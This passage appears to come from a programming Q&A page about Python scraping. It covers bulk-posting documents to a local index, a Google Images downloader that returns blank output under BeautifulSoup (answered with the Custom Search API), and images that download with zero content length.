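One small refinement of the working loop above, sketched under the assumption that the /documents/ endpoint and the 'test13' index are as shown: reusing a single requests.Session keeps the TCP connection open across posts, which is usually enough for "bulk" indexing without going fully async.

import requests, json

# Sketch: reuse one HTTP connection for all documents instead of opening a
# new one per requests.post call. Endpoint and index name are taken from the
# working example above.
session = requests.Session()
session.headers.update({'Content-Type': 'application/json'})

def post_pages(pages, index='test13', url='http://localhost:8000/documents/'):
    for text in pages:
        payload = {'content': text, 'indexes': [index]}
        response = session.post(url, data=json.dumps(payload))
        response.raise_for_status()  # surface 400s instead of silently continuing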

Python2 BeautifulSoup returns Blank output

This is the code I am using for downloading images from the Google results page. The code takes a long time evaluating and downloading the images, so I thought of using the BeautifulSoup library for faster evaluation and download. Here is the original code:
import time
import sys
import os
import urllib2

search_keyword = ['Australia']
keywords = [' high resolution']

def download_page(url):
    import urllib2
    try:
        headers = {}
        headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
        req = urllib2.Request(url, headers = headers)
        response = urllib2.urlopen(req)
        page = response.read()
        return page
    except:
        return "Page Not found"

def _images_get_next_item(s):
    start_line = s.find('rg_di')
    if start_line == -1:
        end_quote = 0
        link = "no_links"
        return link, end_quote
    else:
        start_line = s.find('"class="rg_meta"')
        start_content = s.find('"ou"', start_line+1)
        end_content = s.find(',"ow"', start_content+1)
        content_raw = str(s[start_content+6:end_content-1])
        return content_raw, end_content

def _images_get_all_items(page):
    items = []
    while True:
        item, end_content = _images_get_next_item(page)
        if item == "no_links":
            break
        else:
            items.append(item)
            time.sleep(0.1)
            page = page[end_content:]
    return items

t0 = time.time()
i = 0
while i < len(search_keyword):
    items = []
    iteration = "Item no.: " + str(i+1) + " -->" + " Item name = " + str(search_keyword[i])
    print (iteration)
    print ("Evaluating...")
    search_keywords = search_keyword[i]
    search = search_keywords.replace(' ', '%20')
    try:
        os.makedirs(search_keywords)
    except OSError, e:
        if e.errno != 17:
            raise
        pass
    j = 0
    while j < len(keywords):
        pure_keyword = keywords[j].replace(' ', '%20')
        url = 'https://www.google.com/search?q=' + search + pure_keyword + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg'
        raw_html = (download_page(url))
        time.sleep(0.1)
        items = items + (_images_get_all_items(raw_html))
        j = j + 1
    print ("Total Image Links = "+str(len(items)))
    print ("\n")
    info = open('output.txt', 'a')
    info.write(str(i) + ': ' + str(search_keyword[i-1]) + ": " + str(items) + "\n\n\n")
    info.close()
    t1 = time.time()
    total_time = t1-t0
    print("Total time taken: "+str(total_time)+" Seconds")
    print ("Starting Download...")
    k = 0
    errorCount = 0
    while(k < len(items)):
        from urllib2 import Request, urlopen
        from urllib2 import URLError, HTTPError
        try:
            req = Request(items[k], headers={"User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"})
            response = urlopen(req, None, 15)
            output_file = open(search_keywords+"/"+str(k+1)+".jpg", 'wb')
            data = response.read()
            output_file.write(data)
            response.close();
            print("completed ====> "+str(k+1))
            k = k+1;
        except IOError:
            errorCount += 1
            print("IOError on image "+str(k+1))
            k = k+1;
        except HTTPError as e:
            errorCount += 1
            print("HTTPError"+str(k))
            k = k+1;
        except URLError as e:
            errorCount += 1
            print("URLError "+str(k))
            k = k+1;
    i = i+1

print("\n")
print("Everything downloaded!")
print("\n"+str(errorCount)+" ----> total Errors")
I thought editing the code below would make it work with the BeautifulSoup library and finish my task faster:
def download_page(url):
    import urllib2
    try:
        headers = {}
        headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
        req = urllib2.Request(url, headers = headers)
        #response = urllib2.urlopen(req)
        #page = response.read()
        return BeautifulSoup(urlopen(Request(req)), 'html.parser')
    except:
        return "Page Not found"
But the above code returns blank output. Kindly let me know what I can do to make the code work with BeautifulSoup without any trouble.
You can't just pass Google headers like that. The search engine is a lot more complex than simply substituting some keywords into a GET URL.
HTML is a markup language only useful for one-way rendering of human-readable information. For your application, you need machine-readable markup rather than trying to decipher human-readable text. Google already has a very comprehensive API, https://developers.google.com/custom-search/, which is easy to use and a much better way of achieving this than using BeautifulSoup.
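For illustration, a minimal sketch of querying the Custom Search JSON API for image results with requests. YOUR_API_KEY and YOUR_CSE_ID are placeholders you would create in the Google developer console; treat the exact parameter set as something to verify against the linked documentation.

import requests

# Sketch: ask the Custom Search JSON API for image results instead of
# scraping the HTML results page. Both credentials below are placeholders.
API_KEY = "YOUR_API_KEY"
CSE_ID = "YOUR_CSE_ID"

def image_search(query, num=10):
    params = {
        "key": API_KEY,
        "cx": CSE_ID,
        "q": query,
        "searchType": "image",  # restrict results to images
        "num": num,
    }
    resp = requests.get("https://www.googleapis.com/customsearch/v1", params=params)
    resp.raise_for_status()
    # each result item carries a direct image link in item["link"]
    return [item["link"] for item in resp.json().get("items", [])]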

The downloaded image's content-length is zero

I use Python to download images from a website; sometimes the image's content-length is zero, although the image can be accessed normally in a web browser.
I have tried three methods and get the same result, so how do I resolve this problem?
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 20 13:51:42 2017
"""
import urllib
import urllib2
import re
import uuid
import os
import requests
from lxml import etree
from multiprocessing import Pool

url = 'https://www.sina.com.cn/'
user_agent = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'
request = urllib2.Request(url)
request.add_header('User-Agent', user_agent)
response = urllib2.urlopen(request)
content = response.read()
tree = etree.HTML(content, parser=etree.HTMLParser(encoding='utf-8'))
node = tree.xpath("//img/@src")
dic1 = {}
dic2 = {}
localPath = 'E:\\pictures\\'

def generateFileName():
    return str(uuid.uuid1())

def createFileWithFileName(localPathParam, fileName):
    totalPath = localPathParam + '\\' + fileName
    if not os.path.exists(totalPath):
        file = open(totalPath, 'wb')
        file.close()
    return totalPath

def worker(i):
    path = node[i]
    if not (dic1.has_key(path)):
        dic1[path] = 1
        index = path.rfind('/')
        suffix = path[index+1:]
        filename = suffix
        #filename = generateFileName()+'.'+suffix
        if(re.search(r'^(https?:)?\/\/', path)):
            #print('save picture %s as %s' % (path,filename))
            '''
            #this code gets the same result too
            try:
                urllib.urlretrieve(path, createFileWithFileName(localPath, filename))
            except Exception, ex:
                print(ex.message)
            '''
            with open(localPath + filename, 'wb') as handle:
                response = requests.get(path, timeout=60)
                if not response.ok:
                    print response
                else:
                    print 'wrong when get ' + path
                for block in response.iter_content(1024):
                    if not block:
                        break
                    handle.write(block)
            '''
            #this code gets the same result too
            try:
                req = urllib2.Request(path)
                req.add_header('User-Agent', user_agent)
                picture = urllib2.urlopen(url=path, timeout=5).read()
                document = open(localPath+filename,'wb')
                document.write(picture)
                document.close()
            except Exception, ex:
                print(ex.message)
            '''

if __name__=='__main__':
    p = Pool()
    for i in range(len(node)):
        p.apply_async(worker, args=(i,))
    print 'Waiting for all subprocesses done...'
    p.close()
    p.join()
    print 'All subprocesses done.'
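Not a confirmed diagnosis, but two things worth checking, sketched below: protocol-relative src values (starting with //) have no scheme, so requests cannot fetch them as-is, and some image hosts return an empty body unless a browser-like User-Agent and a Referer header are sent. The helper name and header values are my own, not from the original script.

# Sketch only: normalise protocol-relative URLs and send browser-like
# headers before downloading. Reuses user_agent and url defined above.
def fetch_image(path):
    if path.startswith('//'):
        path = 'https:' + path          # give scheme-less src values a scheme
    headers = {
        'User-Agent': user_agent,       # pretend to be the same browser as above
        'Referer': url,                 # some hosts serve empty bodies without a referer
    }
    resp = requests.get(path, headers=headers, timeout=60)
    resp.raise_for_status()
    return resp.content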
